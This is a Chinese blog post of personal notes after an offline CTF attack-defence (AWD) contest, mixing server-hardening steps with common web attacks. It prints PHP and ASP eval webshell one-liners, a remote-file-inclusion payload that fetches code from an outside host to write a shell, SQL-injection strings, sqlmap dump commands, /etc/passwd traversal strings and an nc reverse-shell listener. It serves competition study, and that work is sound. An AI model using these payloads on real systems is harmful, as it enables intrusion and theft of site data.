1. 程式人生 > >CTF線下賽AWD總結

CTF線下賽AWD總結

AWD

記錄一下自己最近參加的線下攻防比賽,沒時間學習了,就準備了幾天,果然不出意外的被安全專業的大佬打得很慘。

缺點是不會攻擊,我和我隊友兩個人就只有防,AWD防了400分,綜合滲透拿了200分。

感覺自己的知識欠差很多,程式碼審計能力弱,寫指令碼能力弱,sql注入我一直學不會。最重要的是比賽前沒有真正練習過,所以比賽時才沒把技能發揮出來。謹記:多實踐,學好程式碼審計,sql注入,手動寫指令碼!!

比完賽才對這兩種比賽模式有了清晰的瞭解。

AWD就是每隊有自己要維護的幾臺linux靶機,為低許可權或者www許可權,對自己的網站進行防守,對他人進行攻擊。

綜合滲透分外網,內網,專網,需要先滲透外網,在讓外網作為跳板機訪問內網,專網。

給了兩個靶機是永恆之藍漏洞,但比賽時沒想到,就沒法做,還有一臺直接ssh登陸,就有幾個flag。

比賽特別好,服務特別好,邊打比賽,還有水果吃,住的賓館,伙食很棒。對這次比賽滿意,也漲了很多經驗,督促自己如何去學習。下面是比賽時的原始碼。內附很多比賽之前看的網站,

一、ssh登陸,修改密碼超級複雜,mobaxterm,xshell。

     普通使用者提權成root,根據kernel版本號找到對應的poc,exp提權。

二、下載原始碼,備份,/var/www/html 目錄,mobaxterm,winscp,xftp等。

三、預留後門,御劍,k8飛刀,D盾,掃描目錄,發現後門,註釋程式碼。

四、修改資料庫密碼,

> mysql -u root -p

Show databases;

use mysql;

set password for [email protected] = password('123');  或者

update user set password = PASSWORD('要更換的密碼') where user = 'root';

flush privileges

show tables;可能有flag

select * from typecho_flag;

五、關閉不必要的埠,要求的服務埠不能關,

netstat -napt

,lsof -i 檢視埠,

kill -9 PID 殺掉程序

nmap -sV ip地址(-sV引數可以探測目標主機的伺服器版本)

nmap掃描對方開啟的埠,21,22,21,3306,進行爆破,msfconsole進入metasploit ,,,

六、程式碼審計  seay原始碼審計好用,

常見漏洞:一句話木馬,SQL注入、檔案包含、檔案上傳,越權訪問,命令執行。

  1. 一句話木馬

  

防:vim自己的網站php檔案,註釋掉一句話木馬,

<?php @eval($_REQUEST['c']); ?>     <?php @eval($_POST['c']); ?>

asp的一句話是:<%eval request("xx")%>

沒有限制檔案上傳型別,允許後門上傳

攻:菜刀連線一句話木馬所在php的網站路徑,輸入密碼,即可進入到後臺,獲取網站目錄,進而上傳大馬,獲取最高許可權webshell。

沒有的話,自行網站檔案上傳一句話木馬,對檔案型別有限制的話需要BurpSuite抓包,修改content type image/php,根據返回的路徑,連線菜刀。

許可權維持:1.不死馬, 2. nc反彈shell  nc -lp 9999

  1. SQL注入漏洞

(1)使用者登入,輸入’測試存在sql注入點,萬能密碼 ' or 1='1   弱密碼 admin/admin  火狐外掛hackbar

select name,pass from tbAdmin where name='' or 1='1' and pass='123456'

(2)啊D掃描網站sql注入點,sqlmap注入,

比賽時Access資料庫注入點:

sqlmap -u "url"  檢視系統,版本

sqlmap -u "url" --dbs 爆資料庫

sqlmap -u "url" --tables -D ctf 爆表

sqlmap -u "url" --column -D ctf -T users 爆列

sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass"  爆欄位

網站資料庫密碼資訊檔案一般放在config.php中。

3.檔案包含

(1)本地檔案包含

localhost/a.php?file=/flag.txt

(2)遠端檔案包含

localhost/a.php?file=http:ip/echo.txt

利用,上傳一句話木馬

echo.txt 檔案內容,會生成shell.php  內容為一句話木馬。

<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>

常見的檔案包含函式,include(),include_once(),require(),require_once()

幾種經典的測試方法:

?file=../../../../../etc/passwd  長目錄截斷

?page=file:///etc/passwd   讀取敏感檔案

?home=main.cgi

?page=http://www.a.com/1.php

4.越權訪問  allow_url_fopen  =ON, allow_url_include =ON

水平越權:修改id,訪問他人

垂直越權:知道管理後臺的url,通過訪問,提升許可權,獲取資料。

/admin/upload/config.php  越權訪問,無需登陸,直接顯示 

  1. 命令執行漏洞 

直接呼叫作業系統命令,常見php函式system,exec,shell_exec

 

七、網站防禦

上WAF,檔案監控,安全狗, 

在檔案頭寫上,require_once(‘waf.php’);

八、日誌分析,根據自己攻擊payload去攻擊他人。

寫指令碼批量拿flag。

綜合靶場

Nmap掃描靶機,檢視系統,metasploit 漏洞利用,根據相應的系統核心漏洞,提權,

獲取後臺密碼,登入後臺,根目錄下flag

建立新使用者,新增到管理員組,遠端目標靶機。

可能存在flag的位置:

  1. 御劍掃描,雙擊網頁開啟,存在flag。
  2. ssh登陸,系統根目錄下,/var/www/html下
  3. mysql資料庫欄位中。
  4. 遠端主機桌面,資料夾下。

==================網站合集====================

=============================

相關推薦

CTFAWD總結

AWD 記錄一下自己最近參加的線下攻防比賽,沒時間學習了,就準備了幾天,果然不出意外的被安全專業的大佬打得很慘。 缺點是不會攻擊,我和我隊友兩個人就只有防,AWD防了400分,綜合滲透拿了200分。 感覺自己的知識欠差很多,程式碼審計能力弱,寫指令碼能力弱,

CTFAWD模式的生存技巧

scan 經驗 payload attack flag 時也 兩個 版本 ebs 作者:Veneno@Nu1L 稿費:200RMB 投稿方式:發送郵件至linwei#360.cn,或登陸網頁版在線投稿 原文:https://www.anquanke.com/p

CTF-AWD必備PHP大馬

分享幾個php大馬  <?php $GLOBALS['pass'] = "6d31b7d21395a26b8035fdd7b94bb070d5993de3";$func="cr"/*-/-*/."eat"./*-/-*/"e_fun"/*-/-*/."cti"/*

博地球杯WEB_RCE Write_up

這次參與賽博地球杯線下賽出題,看到巨佬們強還是強啊,先膜一下,然後獻上自己的出題思路,萌新出題,輕噴 !!! 第一步、登入 檢視網站發現網站無法登入,並且根據robots.txt能發現hint.php和hack.php 不過可以注意到cookie中

2018 ACM-ICPC 寧夏邀請賽

    通過網路賽獲取了參加線下賽的資格,上大學以來第一次跑這麼遠打比賽=v=    9號凌晨抵達銀川火車站,校方安排好了接送車輛直接送去賓館。    到賓館就已經一點多了,直接洗洗睡了。    10號早晨在酒店吃完早餐就打車到寧夏理工學院集合。真滴秀,一個學校佔了一個島_(

CTF奪旗經驗總結及落地實踐

中國是科技人才資源最多的國家之一,但也是人才流失比較嚴重的國家。世界各國已經把加強人才建設作為搶佔網路空間制高點的戰略舉措。在此背景下,國內外各類CTF比賽越來越多,那麼怎樣一方面才能準備好比賽,另一方面又怎樣才能組織好比賽,小編請兩位專家來聊聊。 什麼是CTF奪旗賽 C

ISCC2018河南賽區的一道Reverse題writeup

0x01:先執行一下 發現GetFlag按鈕是灰色的  輸入無反應 直接用灰色按鈕剋星啟用(spy++也行)   點選後出現假的flag(當時還傻傻提交好多次。。。) 0x02:PEiD

linuxcan總移植及測試總結

哪裏 ips sub 開關 switch 發現 開發 主機 編譯工具 Can移植及測試總結 Adding Flexcan driver support on Kernel 一.On kernel menuconfig, add the following items: [*

AWD 攻防生存之道(Web 方向)

隨著網路安全的熱門,CTF 比賽也如春筍般崛起。AWD 無疑使 CTF 比賽中最有趣的環節。本 Chat 講會講解 AWD 線下比賽中的攻防之道,帶你快速的入門 AWD 攻防,體會“HACKER”在網路世界中廝殺的樂趣。 本 Chat 將會從以下幾個方向去討論: AWD 比賽的快速上手;

i春秋培訓 ctf比賽關卡

第一關 tobot 訪問目標連結 只得到一張圖片  還以為是一些老套路 抓包 儲存圖片 以各種形式開啟  並沒有得到什麼資訊 突然想到robots.txt 訪問 得到如下資訊  訪問其目錄  

HttpClient在多程環境踩坑總結

批量 detail 地址 3.1 nop true jmap命令 mux -c 問題現場 在多線程環境下使用HttpClient組件對某個HTTP服務發起請求,運行一段時間之後發現客戶端主機CPU利用率呈現出下降趨勢,而不是一個穩定的狀態。 而且,從程序日誌中判斷有線程處於

參加湛江新教育群活動有感

content 價值 ont .html nba 大學 log blank 毫無 緣起 一直關註教育,從大學到小學。所以一個朋友向我推薦了新教育——今日學堂。以及昨晚(2014.06.13)的湛江新教育群在赤坎的線下活動。感受最深的是看到有那麽幾個家長。真正在憂

多進程間通信方式和多程同步機制總結

post msd 阻塞 ng- div 文件映射 管理 線程 -m 多進程之間通信方式: 文件映射:本地之間 共享內存:本地之間 匿名管道:本地之間 命名管道:跨服務器 郵

小豬CMS沙龍完美閉幕,開啟合作共贏新征程!

小豬CMS 線下沙龍 小豬CMS線下沙龍完美閉幕,開啟合作共贏新征程! 2017年6月13日,小豬CMS線下沙龍交流會在中國·合肥隆重召開。來自全國各地的互聯網創業者、小豬智慧店鋪代理商客戶們濟濟一堂,共同學習和探討移動互聯網趨勢下,行業如何實現經營模式轉型、高效開展業務,以及門店如何快速

Java多程編程總結

接口實現 thread 資源 模式 ext rand tid 應用程序 線程間的通信 Java線程:概念與原理 Java線程:創建與啟動 Java線程:線程棧模型與線程的變量 Java線程:線程狀態的轉換 Java線程:線程的同步與鎖 Java線程:線程的交互 Java

支付寶支付商家 開通微信支付寶商家簽約資料

二維碼支付代理 支付寶線下支付商家 付寶支付代理 微信支付寶商家簽約資料杭州合言信息科技有限公司-專註移動支付領域,二維碼支付代理,支付寶線下支付商家,支付寶支付代理,主要是服務於商戶,商戶和其一次對接之後,能同時支持微信支付,支付寶支付,百度錢包等多個支付渠道,包括支持多種第三方支付平臺、合作銀行及其他服務

支付寶收單招商加盟 代理商盈利分析

支付寶線下收單 代理商盈利 支付寶招商加盟 杭州合言信息科技有公司,是支付寶渠道商授權的北京地區一級代理商,現誠招全國各區代理,支付寶加盟合作,線下收單高分潤。“低”門檻,公司執行“一對一支持政策”,任何加盟代理費,全程技術支持,低價提供收單終端設備,並且提供各行業營銷方案,我們的合作

微信小程序平臺化開發案例,公開多商家門店盈利模式

運營 實例 images .cn 技術分享 盈利 後臺管理系統 線下 招募 小程序商圈平臺、多商家/門店入駐、開發管理後臺(實例分析) 咫尺網絡 出品 1、小程序“商圈平臺”開發設計源碼小程序平臺化經營,占據商圈流量高點,對外招募商家門店(多樣化盈利模式),打造人氣

微信小程序怎麽用?商家最適合玩小程序

align 客戶 特點 商業 很好 p s 產生 零售業 要素 隨著微信小程序不斷地釋放新功能,許多行業越來越關註小程序,目前已經有不少餐飲和線下傳統零售企業開始謀劃利用好小程序。但是,線下商業有著復雜的場景,如何針對自己行業的特點和需求開發出屬於自己的小程序,是擺在商家面

走到線上,藝術品能否找到新突破口?

資源 公司 關系 授權 市場 相對 嚴重 年輕 廣泛 藝術品因其具有的收藏價值、文化價值、觀賞價值以及不可復制性,讓收藏者願不遠萬裏前去赴約,許以千金只求抱得珍品歸。中國作為有五千年悠久歷史的古國之一,前人留下的傳世藝術品不計其數,藝術品交易需求不小,但是傳統的線下藝術品